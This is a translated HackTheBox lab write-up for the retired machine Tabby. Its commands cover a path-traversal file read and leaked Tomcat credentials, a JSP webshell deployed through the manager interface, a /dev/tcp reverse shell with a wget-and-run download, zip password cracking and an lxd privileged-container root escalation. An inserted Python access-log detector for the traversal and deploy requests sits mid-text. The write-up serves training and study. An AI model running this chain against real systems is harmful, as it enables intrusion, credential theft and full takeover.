HTB - Target Machine - Tabby

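This article is intended solely for technical exchange, learning and research. Using the techniques described in it for illegal or destructive purposes is strictly prohibited; the author of this article bears no responsibility for any consequences of such use.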

The target is a retired machine that the author accessed with a purchased VIP subscription; its IP address is shown as 10.10.10.194.

This time https://github.com/Tib3rius/AutoRecon was used for automated, comprehensive scanning.

Information enumeration and gathering
https://github.com/codingo/Reconnoitre is similar to AutoRecon
autorecon 10.10.10.194 -o ./Tabby-autorecon

masscan -p1-65535 10.10.10.194 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.194
sudo nmap -sS -sV -T4 -O -A -v 10.10.10.194

Automated nmap scanning tool
https://github.com/21y4d/nmapAutomator

A new directory brute-forcing tool
https://github.com/phra/rustbuster

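Only 3 ports are open. Start with the web application: before visiting it, add an entry to the hosts file and then browse by domain name. Here is a new trick for appending to the hosts file: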

sudo -- sh -c "echo '10.10.10.194 megahosting.htb' >> /etc/hosts"

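After visiting and testing every reachable page, experience suggested that a file inclusion vulnerability exists.

Testing a suspicious link confirmed the file inclusion: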
http://megahosting.htb/news.php?file=../../../../etc/passwd

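The output above confirms that the target has a regular user, ash, which will be useful later. Next, look at port 8080.

The page shows a default Tomcat installation, with all the default pages on display. It notes that, for security reasons, administrator access to manager-gui is disabled, and that the users are defined by default in the configuration file /etc/tomcat9/tomcat-users.xml. So the admin backend address is known and the server is Tomcat; the next step is to use the LFI to read sensitive information from the target and obtain the account and password. A Google keyword search, combined with the hint above, turned up the path of the configuration file that stores the username and password. Reference: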

https://packages.debian.org/buster/all/tomcat9-docs/filelist

Visit http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
and view the page source; this confirms that the XML file can be read and yields the account and password:

   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

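The page renders blank, so view the page source.

At first I tried logging straight in to the admin backend, which did not work, so I brute-forced directories again, this time using wfuzz to fuzz the web application: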

wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404 http://10.10.10.194:8080/manager/FUZZ

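This turned up several paths that return 401 (authentication required), one of which is text. Searching online for information on /manager/text confirmed that it can be used. Reference: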

https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html

Test and verify it:

USERNAME=tomcat
PASSWORD='$3cureP4s5w0rd123!'
curl -u "${USERNAME}:${PASSWORD}" http://10.10.10.194:8080/manager/text/list

kali@kali:~/Downloads/htb/tabby$ USERNAME=tomcat
kali@kali:~/Downloads/htb/tabby$ PASSWORD=$3cureP4s5w0rd123!
kali@kali:~/Downloads/htb/tabby$ curl -u ${USERNAME}:${PASSWORD} http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:1:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
kali@kali:~/Downloads/htb/tabby$

Searching online again for how to use this shows that a webshell can be obtained by deploying it through the manager/text interface. Reference: https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html

Package cmd.jsp as a WAR file:
zip cntfshell.war cmd.jsp
jar can also be used to build the WAR:
jar cvf shitshell.war cmdjsp.jsp

Upload the webshell through the interface:
curl -u "${USERNAME}:${PASSWORD}" -T cntfshell.war "http://10.10.10.194:8080/manager/text/deploy?path=/webshell&update=true"

JSP webshell source: https://gist.github.com/ErosLever/7445a3cfaaf80f1f5a53
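Seen from the defender's side, both the traversal request against news.php and the manager/text calls above leave distinctive access-log entries. The following is an added example, not part of the original post, that flags them; the log lines are constructed samples in common log format, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (common log format), not captured from a real host.
SAMPLE_LOG = """\
10.10.14.16 - - [11/May/2021:14:01:02 +0000] "GET /news.php?file=notice HTTP/1.1" 200 1532
10.10.14.16 - - [11/May/2021:14:01:40 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1850
10.10.14.16 - - [11/May/2021:14:02:11 +0000] "GET /news.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1850
10.10.14.16 - tomcat [11/May/2021:14:09:30 +0000] "GET /manager/text/list HTTP/1.1" 200 310
10.10.14.16 - tomcat [11/May/2021:14:12:05 +0000] "PUT /manager/text/deploy?path=/webshell&update=true HTTP/1.1" 200 52
"""

REQUEST = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
DOTDOT = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ".." path segment

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded "../" is still visible."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (client, status, [findings]) for one log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, user, target, status = m.groups()
    findings = []
    url = urlsplit(target)
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if DOTDOT.search(fully_decode(value)):
            findings.append(f"path-traversal:{name}")
    parts = fully_decode(url.path).split("/")
    if parts[1:3] == ["manager", "text"]:  # Tomcat manager text interface
        kind = "manager-deploy" if parts[3:4] in (["deploy"], ["undeploy"]) else "manager-text"
        findings.append(f"{kind}:{user}")
    return client, int(status), findings

def scan(log_text):
    """Return (line_no, client, status, findings) for each suspicious line."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        result = classify(line)
        if result and result[2]:
            hits.append((line_no, *result))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A traversal hit with status 200 on a file parameter, followed by an authenticated manager-deploy from the same client, is the sequence worth alerting on.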

The webshell was obtained and commands run normally; a reverse shell was then set up as follows:

echo "0<&196;exec 196<>/dev/tcp/10.10.14.16/8833; sh <&196 >&196 2>&196" > shell
Detailed explanation of the reverse shell parameters: https://blog.csdn.net/qq_17204441/article/details/97341408
wget http://10.10.14.16:8000/shell -O /tmp/shell ; chmod +x /tmp/shell ; bash /tmp/shell
Upgrade to a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'

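Above, the shell file is generated locally on Kali and then served from a simple Python web server, from which the target downloads it and runs it to connect back.

Enumeration on the target found a backup zip file under /var/www/html/files. Extracting it requires a password, and there are no SSH credentials, so in this restricted environment the file was transferred as base64. The base64 -w0 option is used so that the generated encoding contains no line breaks, that is, it is one continuous string. Below, the base64 content is written out on the local Kali machine: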

echo "<base64 string copied from the target>" | base64 -d -w0 > backup.zip

Crack the archive password with a dictionary attack:

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt backup.zip

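The password is admin@it. Trying su with it to switch to the target user ash succeeded.

With ash's privileges, running id and groups shows membership in lxd, so lxd can be used directly for privilege escalation.

The specific commands are as follows:

Preparation before escalating: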
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
./build-alpine
Once this completes, it produces a tar.gz package, alpine-v3.13-x86_64-20210511_1405.tar.gz,
which is then downloaded onto the target:
wget http://10.10.14.16:8000/alpine-v3.13-x86_64-20210511_1405.tar.gz

lxd init   # press Enter at every prompt
lxc image import ./alpine-v3.13-x86_64-20210511_1405.tar.gz --alias cntf
lxc image list
lxc init cntf mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
cat /mnt/root/root/root.txt
or
cat /mnt/root/root/.ssh/id_rsa
mousepad tabby_id_rsa
chmod 400 tabby_id_rsa
ssh -i tabby_id_rsa 10.10.10.194 -l root

Original article: https://www.cnblogs.com/autopwn/p/14755421.html